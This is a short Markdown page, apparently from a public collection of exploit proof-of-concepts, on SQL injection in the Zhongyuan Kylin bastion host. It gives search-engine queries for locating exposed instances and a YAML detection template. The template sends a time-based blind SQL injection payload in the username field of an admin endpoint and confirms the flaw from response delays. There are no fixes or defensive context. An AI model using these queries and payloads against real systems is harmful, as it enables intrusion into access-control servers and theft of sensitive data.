Skip to content

Latest commit

 

History

History
36 lines (29 loc) · 1.22 KB

中远麒麟堡垒机SQL注入.md

File metadata and controls

36 lines (29 loc) · 1.22 KB

麒麟堡垒机用于运维管理的认证、授权、审计等监控管理。中远麒麟堡垒机存在SQL注入,可利用该漏洞获取系统敏感信息。

检索条件:

cert="Baolei"||title="麒麟堡垒机"||body="admin.php?controller=admin_index&action=get_user_login_fristauth"||body="admin.php?controller=admin_index&action=login"

poc:

 relative: req0 && req1
  session: false
  requests:
  - method: POST
    timeout: 10
    path: /admin.php?controller=admin_commonuser
    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
        like Gecko) Chrome/69.0.2786.81 Safari/537.36
    data: username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
    follow_redirects: true
    matches: (code.eq("200") && time.gt("5") && time.lt("10"))
  - method: POST
    timeout: 10
    path: /admin.php?controller=admin_commonuser
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
        like Gecko) Chrome/69.0.2786.81 Safari/537.36
      Content-Type: application/x-www-form-urlencoded
    data: username=admin
    follow_redirects: true
    matches: time.lt("5")